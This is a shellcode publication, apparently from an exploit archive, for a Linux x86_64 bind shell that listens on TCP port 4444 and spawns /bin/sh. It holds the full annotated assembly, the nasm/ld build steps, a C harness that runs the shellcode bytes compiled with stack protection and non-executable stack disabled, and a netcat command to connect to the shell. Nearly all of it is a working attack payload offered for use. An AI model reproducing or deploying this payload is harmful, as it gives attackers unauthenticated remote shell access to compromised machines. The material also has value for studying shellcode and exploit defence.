Linux x86 64 TCP 4444 Bindshell Shellcode

;Title: Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh)
;Author: Aron Mihaljevic
;Architecture: Linux x86_64
;Shellcode Length: 131 bytes
;github = https://github.com/STARRBOY ;Title: Linux/x86_64 - Bind (4444/TCP) Shell (/bin/sh)
;Author: Aron Mihaljevic
;Architecture: Linux x86_64
;Shellcode Length: 131 bytes
;github = https://github.com/STARRBOY
;test shellcode = after you run the shellcode, open another terminal and run "netcat -vv 0.0.0.0 4444"


================== ASSEMBLY ========================================


global _start


section .text

_start:


xor rsi, rsi ;set rsi to zero, since we will push syscall and first param on the stack and then pop it of we don't need to
;set rax and rdi to zero

create_socket:

;int socket(int domain, int type, int protocol);
push 41 ;sys_socket
pop rax
push 2
pop rdi
inc rsi ;SOCK_STREAM
xor rdx, rdx
syscall

;save the return value for future use
xchg rdi, rax


; sin_zero: 0
; sin_addr.s_addr: INADDR_ANY = 0
; sin_port: 4444
; sin_family: AF_INET = 2
xor rax, rax
push rax ; sin_zero
push rax ; zero out another 8 bytes for remaining members
mov word [rsp+2], 0x5c11 ; sin_port = 4444
mov byte [rsp], 0x2 ; sin_family

bind:
;int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
xor rdx, rdx
push 49
pop rax
push rsp
pop rsi ;sockaddr stack pointer
add rdx, 16 ;sizeof sockaddr
syscall


listen:
;int listen(int sockfd, int backlog);
xor rsi, rsi
push 50 ;sys_listen
pop rax
inc rsi ;backlog = number of clients
syscall


accept:
;int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
push 43 ;sys_accept
pop rax
mov rsi, rsp ; stack pointer for client sockaddr
mov byte [rsp-1], 0x10 ; put size of the structure on the stack
dec rsp ; adjust stack pointer for previous
mov rdx, rsp ; stack pointer for struct size
syscall

;save client socket
xchg r10, rax


close:
;int close(int fd);
push 3 ;sys_close
pop rax
push rax ;save 3 on the stack for rsi in dup2
syscall


xchg rdi, r10 ;client socket as first parameter for dup2
pop rsi

dup2loop:

;int dup2(int oldfd, int newfd);
push 33 ;sys_dup2
pop rax
dec rsi
syscall
loopnz dup2loop



spawn_shell:

;int execve(const char *filename, char *const argv[], char *const envp[]);
xor eax, eax
add al, 59 ;sys_execve
xor rdi, rdi ;set rdi to zero
push rdi ;push null on the stack
mov rdi, 0x68732F2f6e69622F ;bin//sh in reverse
push rdi
mov rdi, rsp ;set stack pointer to rdi
xor rsi, rsi ;rsi and rdx == 0
xor rdx, rdx
syscall



=======Generate Shellcode==========================================
nasm -felf64 tcp_bind.nasm -o tcp_bind.o
ld tcp_bind.o -o tcp_bind


=========generate C program to exploit=============================
gcc -fno-stack-protector -z execstack bind.c -o bind


======================C program=====================================

#include <stdio.h>
#include <string.h>

unsigned char shellcode[]=
"x48x31xf6x6ax29x58x6ax02x5fx48xffxc6x48"
"x31xd2x0fx05x48x97x48x31xc0x50x50x66xc7"
"x44x24x02x11x5cxc6x04x24x02x48x31xd2x6a"
"x31x58x54x5ex48x83xc2x10x0fx05x48x31xf6"
"x6ax32x58x48xffxc6x0fx05x6ax2bx58x48x89"
"xe6xc6x44x24xffx10x48xffxccx48x89xe2x0f"
"x05x49x92x6ax03x58x50x0fx05x49x87xfax5e"
"x6ax21x58x48xffxcex0fx05xe0xf6x31xc0x04"
"x3bx48x31xffx57x48xbfx2fx62x69x6ex2fx2f"
"x73x68x57x48x89xe7x48x31xf6x48x31xd2x0fx05";

int main(){

printf("length of your shellcode is: %d ", (int)strlen(shellcode));

int (*ret)() = (int(*)())shellcode;

ret();
}